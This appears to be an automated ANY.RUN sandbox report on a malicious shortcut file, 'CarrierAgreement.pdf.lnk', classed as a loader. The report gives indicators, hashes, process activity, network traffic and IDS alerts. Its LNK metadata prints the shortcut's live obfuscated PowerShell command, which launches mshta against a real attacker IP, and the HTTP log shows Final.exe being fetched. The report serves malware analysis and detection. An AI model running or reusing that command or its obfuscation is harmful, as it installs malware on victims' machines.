File name:

CarrierAgreement.pdf.lnk

Full analysis: https://app.any.run/tasks/09bcabcf-0df4-4879-b0a3-a6f625447f14
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: March 24, 2025, 21:33:20
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
loader
installer
qrcode
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles%\Microsoft\Edge\Application\msedge.exe" KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, length=0, window=showminnoactive, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\"
MD5:

0F2138ECCF152F982B8CCA16DEEED260

SHA1:

EF1F7AA1CD1850E986147630C6DB6AE65AF64BFA

SHA256:

54B45729C8A1A2303A8D883CB8A1B5BBADA0E5DB5DFF830EA2AA227A6FDF0663

SSDEEP:

24:8N84ZsxtBff1efVKayWtie/CWgOgfgtgrgfgza88gamgjgYgGugYgd+KgxjgxCg3:8GBX1e3ztoynYUZw+do9aQP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes powershell execution policy (Unrestricted)

      • mshta.exe (PID: 7496)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7604)

    • Request from PowerShell that ran from MSHTA.EXE

      • powershell.exe (PID: 7604)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 7604)

    • Executing a file with an untrusted certificate

      • Final.exe (PID: 7400)

    • Changes the autorun value in the registry

      • Final.exe (PID: 7400)

  • SUSPICIOUS

    • Process drops legitimate windows executable

      • mshta.exe (PID: 7496)

    • The process bypasses the loading of PowerShell profile settings

      • mshta.exe (PID: 7496)

    • Executable content was dropped or overwritten

      • mshta.exe (PID: 7496)
      • powershell.exe (PID: 7604)
      • csc.exe (PID: 1128)
      • Final.exe (PID: 7400)

    • Probably obfuscated PowerShell command line is found

      • mshta.exe (PID: 7496)

    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 7496)

    • Executes script without checking the security policy

      • powershell.exe (PID: 7604)

    • Potential Corporate Privacy Violation

      • mshta.exe (PID: 7496)

    • Connects to the server without a host name

      • powershell.exe (PID: 7604)

    • Process requests binary or script from the Internet

      • powershell.exe (PID: 7604)

    • Reads Microsoft Outlook installation path

      • OpenWith.exe (PID: 1164)

    • Reads the date of Windows installation

      • MSBuild.exe (PID: 6592)

    • Reads the Windows owner or organization settings

      • MSBuild.exe (PID: 6592)

  • INFO

    • Checks proxy server information

      • mshta.exe (PID: 7496)
      • powershell.exe (PID: 7604)
      • slui.exe (PID: 4728)

    • The sample compiled with english language support

      • mshta.exe (PID: 7496)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 7496)
      • OUTLOOK.EXE (PID: 7436)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7604)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 7604)

    • Disables trace logs

      • powershell.exe (PID: 7604)

    • Application launched itself

      • Acrobat.exe (PID: 7772)
      • AcroCEF.exe (PID: 8000)
      • msedge.exe (PID: 7688)

    • Reads security settings of Internet Explorer

      • OpenWith.exe (PID: 1164)

    • Reads Microsoft Office registry keys

      • Acrobat.exe (PID: 7772)
      • OpenWith.exe (PID: 1164)

    • The executable file from the user directory is run by the Powershell process

      • Final.exe (PID: 7400)

    • Checks supported languages

      • MSBuild.exe (PID: 6592)
      • Final.exe (PID: 7400)
      • csc.exe (PID: 1128)
      • cvtres.exe (PID: 5964)
      • ielowutil.exe (PID: 2968)
      • identity_helper.exe (PID: 7724)

    • Reads the computer name

      • Final.exe (PID: 7400)
      • MSBuild.exe (PID: 6592)
      • ielowutil.exe (PID: 2968)
      • identity_helper.exe (PID: 7724)

    • Reads the machine GUID from the registry

      • Final.exe (PID: 7400)
      • csc.exe (PID: 1128)
      • MSBuild.exe (PID: 6592)

    • Create files in a temporary directory

      • Final.exe (PID: 7400)
      • csc.exe (PID: 1128)
      • cvtres.exe (PID: 5964)

    • Creates files or folders in the user directory

      • Final.exe (PID: 7400)

    • Reads CPU info

      • MSBuild.exe (PID: 6592)

    • Reads Windows Product ID

      • MSBuild.exe (PID: 6592)

    • Reads Environment values

      • MSBuild.exe (PID: 6592)
      • identity_helper.exe (PID: 7724)

    • Reads product name

      • MSBuild.exe (PID: 6592)

    • Process checks whether UAC notifications are on

      • OUTLOOK.EXE (PID: 7436)

    • Manual execution by a user

      • msedge.exe (PID: 7688)

    • Local mutex for internet shortcut management

      • iexplore.exe (PID: 7248)

    • Reads the software policy settings

      • slui.exe (PID: 4728)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon
FileAttributes: (none)
TargetFileSize: -
IconIndex: 11
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: powershell.exe
RelativePath: ..\..\..\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLineArguments: . ([char]105+[char]101+[char]120)('m£s£h£££t£££a£ £££h£££t£££tp£:/££/£££9££1.£1£££0£££3£££.2£5£££3£££.££49£/££C£a£££r£££r£ier£££A£g£££r£eem£en££t' -replace '£')"
IconFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
200
Monitored processes
71
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs mshta.exe powershell.exe conhost.exe no specs acrobat.exe acrobat.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe acrocef.exe no specs acrocef.exe no specs openwith.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs final.exe outlook.exe csc.exe conhost.exe no specs cvtres.exe no specs msbuild.exe no specs msbuild.exe acrocef.exe no specs outlook.exe no specs ai.exe no specs ielowutil.exe no specs iexplore.exe iexplore.exe slui.exe msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
744"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6772 --field-trial-handle=2412,i,9853593263394293270,17793880986224112630,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
812"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=gpu-process --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2692 --field-trial-handle=1668,i,10068507193833725143,4915845907437535524,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:2C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
904"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6528 --field-trial-handle=2412,i,9853593263394293270,17793880986224112630,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
920"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=gpu-process --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2580 --field-trial-handle=1668,i,10068507193833725143,4915845907437535524,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:2C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1012"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFinal.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Exit code:
4294967295
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
1128"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\xwz152rb.cmdline"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Final.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ole32.dll
1164C:\WINDOWS\system32\OpenWith.exe -EmbeddingC:\Windows\System32\OpenWith.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Pick an app
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\openwith.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
2316"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2408 --field-trial-handle=2412,i,9853593263394293270,17793880986224112630,262144 --variations-seed-version /prefetch:2C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2384"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2840 --field-trial-handle=1668,i,10068507193833725143,4915845907437535524,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
2968"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -EmbeddingC:\Program Files (x86)\Internet Explorer\ielowutil.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Low-Mic Utility Tool
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\program files (x86)\internet explorer\ielowutil.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
Total events
61 210
Read events
60 562
Write events
562
Delete events
86

Modification events

(PID) Process:(7496) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(7496) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(7496) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(7604) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithProgids
Operation:writeName:Acrobat.Document.DC
Value:
(PID) Process:(7772) Acrobat.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2034283098-2252572593-1072577386-2659511007-3245387615-27016815-3920691934
Operation:writeName:DisplayName
Value:
Adobe Acrobat Reader Protected Mode
(PID) Process:(7896) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\ExitSection
Operation:writeName:bLastExitNormal
Value:
0
(PID) Process:(7896) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVEntitlement
Operation:writeName:bSynchronizeOPL
Value:
0
(PID) Process:(7896) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral
Operation:writeName:uLastAppLaunchTimeStamp
Value:
(PID) Process:(7896) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral
Operation:writeName:iNumAcrobatLaunches
Value:
7
(PID) Process:(7896) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\NoTimeOut
Operation:writeName:smailto
Value:
5900
Executable files
11
Suspicious files
535
Text files
92
Unknown types
0

Dropped files

PID
Process
Filename
Type
7316powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_outssgbl.tpp.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7316powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PXKFMN3XGZC6H4F6DZIJ.tempbinary
MD5:E202BC7D45EC7F507C5368AC438CBEEB
SHA256:4DB77DE698228E9654E0622A063EE589AAB952EB545510D3A8E6B877B25EAFCA
7316powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_j1qrhgul.tqi.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8000AcroCEF.exeC:\Users\admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.oldtext
MD5:8412AEEF2309E13FC954061D9BCEFFF4
SHA256:D062D7B5DF5F3BCB753E97AB5D1DCD9CF62058D9103DA383DBE1F482FC1D4644
7896Acrobat.exeC:\Users\admin\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txttext
MD5:CDA728256ECB3980324037A6C70E311C
SHA256:2EE6CC88F59F5143ABCF0AC66466299048F837C7C150C89073BC80E7FB81F871
7896Acrobat.exeC:\Users\admin\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.1.20093.6 2025-03-24 21-33-42-732.logtext
MD5:460C6041966002D8384A18C895A65EB0
SHA256:C83EC6E8FB3EC62481289C033238C1D9B08DB8076EAAD304099FD7A7F594F1B9
8000AcroCEF.exeC:\Users\admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old~RF10fb0b.TMPtext
MD5:ED7D8AAE48211E2BFAF557130572C62A
SHA256:A5CF8D8ADC86DCA357396AF7E3A24A116072D5C1E5552EEB76601AE2673DED6E
8000AcroCEF.exeC:\Users\admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.oldtext
MD5:2EF1F7C0782D1A46974286420D24F629
SHA256:D3A9BB7E09E1F4B0C41FF7808E930DDACF5DB3BACD98ECCF5BC7DB4863D1FCF5
7896Acrobat.exeC:\Users\admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEventsbinary
MD5:A825E8699BDD21021A350BCDD1A32C47
SHA256:BBD3F26BFF5A6A35BA8F5023787D4D96267600F0229904B6627DE1AA94C6F9E7
8000AcroCEF.exeC:\Users\admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RF10fa02.TMPtext
MD5:D012E5B4EB91B61F6E8AE2F8EC3C623E
SHA256:1BDA750084F20306722008016420E1912BA608CA8EFB9C661F7E7EFCF5E89673
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
209
TCP/UDP connections
170
DNS requests
134
Threats
38

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
91.103.253.49:80
http://91.103.253.49/CarrierAgreement
unknown
unknown
7604
powershell.exe
GET
200
91.103.253.49:80
http://91.103.253.49/1.pdf
unknown
unknown
7604
powershell.exe
GET
200
91.103.253.49:80
http://91.103.253.49/Final.exe
unknown
unknown
OPTIONS
204
3.219.243.226:443
https://p13n.adobe.io/psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&adcProductLanguage=en-us&adcVersion=23.1.20093&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RU&adcXAPIClientID=api_reader_desktop_win_23.1.20093&encodingScheme=BASE_64
unknown
HEAD
200
23.50.131.78:443
https://uci.cdn.office.net/mirrored/smartlookup/current/scripts/microsoft.office.smartlookup.ssr.js
unknown
HEAD
200
23.50.131.89:443
https://uci.cdn.office.net/mirrored/smartlookup/current/version.json
unknown
GET
200
23.35.236.137:443
https://geo2.adobe.com/
unknown
text
48 b
whitelisted
GET
200
52.111.236.4:443
https://messaging.lifecycle.office.com/getcustommessage16?app=6&ui=en-US&src=BizBar&messagetype=BizBar&hwid=04111-083-043729&ver=16.0.16026&lc=en-US&platform=10%3A0%3A19045%3A2%3A0%3A0%3A256%3A1%3A&productid=%7B1717C1E0-47D3-4899-A6D3-1022DB7415E0%7D%3A00411-10830-43729-AA720%3AOffice%2019%2C%20Office19Professional2019R_Retail%20edition&clientsessionid=%7B5D8F25AF-E550-40ED-B816-0426C6DDD0AB%7D&datapropertybag=%7B%22Audience%22%3A%22Production%22%2C%22AudienceGroup%22%3A%22Production%22%2C%22AudienceChannel%22%3A%22CC%22%2C%22Flight%22%3A%22ofsh6c2b1tla1a31%2Cofcrui4yvdulbf31%2Cofhpex3jznepoo31%2Cofpioygfqmufst31%22%7D
unknown
text
542 b
whitelisted
GET
200
23.50.131.78:443
https://uci.cdn.office.net/mirrored/smartlookup/current/scripts/microsoft.office.smartlookup.ssr.js
unknown
binary
2.50 Mb
whitelisted
GET
200
52.6.155.20:443
https://p13n.adobe.io/psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&adcProductLanguage=en-us&adcVersion=23.1.20093&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RU&adcXAPIClientID=api_reader_desktop_win_23.1.20093&encodingScheme=BASE_64
unknown
binary
187 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
7496
mshta.exe
91.103.253.49:80
Leaseweb Deutschland GmbH
DE
unknown
7604
powershell.exe
91.103.253.49:80
Leaseweb Deutschland GmbH
DE
unknown
8184
AcroCEF.exe
95.100.184.205:443
geo2.adobe.com
AKAMAI-AS
FR
whitelisted
8184
AcroCEF.exe
50.16.47.176:443
p13n.adobe.io
AMAZON-AES
US
whitelisted
7436
OUTLOOK.EXE
52.123.129.14:443
ecs.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
6592
MSBuild.exe
212.18.104.245:443
Anas Firas Flayyih Al-Qaysi
GB
unknown
8184
AcroCEF.exe
2.23.244.205:443
armmf.adobe.com
Ooredoo Q.S.C.
QA
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
google.com
  • 142.250.186.110
whitelisted
geo2.adobe.com
  • 95.100.184.205
whitelisted
p13n.adobe.io
  • 50.16.47.176
  • 54.224.241.105
  • 34.237.241.83
  • 18.213.11.84
whitelisted
ecs.office.com
  • 52.123.129.14
  • 52.123.128.14
whitelisted
armmf.adobe.com
  • 2.23.244.205
whitelisted
omex.cdn.office.net
  • 2.22.242.226
  • 2.22.242.104
  • 2.22.242.97
  • 2.22.242.130
whitelisted
acroipm2.adobe.com
  • 2.22.242.11
  • 2.22.242.123
whitelisted
messaging.lifecycle.office.com
  • 52.111.236.4
whitelisted
self.events.data.microsoft.com
  • 40.79.141.153
whitelisted

Threats

PID
Process
Class
Message
7496
mshta.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
7496
mshta.exe
Misc activity
ET INFO Packed Executable Download
7496
mshta.exe
Potentially Bad Traffic
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
7604
powershell.exe
Potentially Bad Traffic
ET INFO Dotted Quad Host PDF Request
7604
powershell.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
6592
MSBuild.exe
Generic Protocol Command Decode
SURICATA HTTP request header invalid
6592
MSBuild.exe
Generic Protocol Command Decode
SURICATA HTTP request field missing colon
6592
MSBuild.exe
Generic Protocol Command Decode
SURICATA HTTP METHOD terminated by non-compliant character
6592
MSBuild.exe
Generic Protocol Command Decode
SURICATA HTTP URI terminated by non-compliant character
Generic Protocol Command Decode
SURICATA HTTP request field missing colon
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
CarrierAgreement.pdf.lnk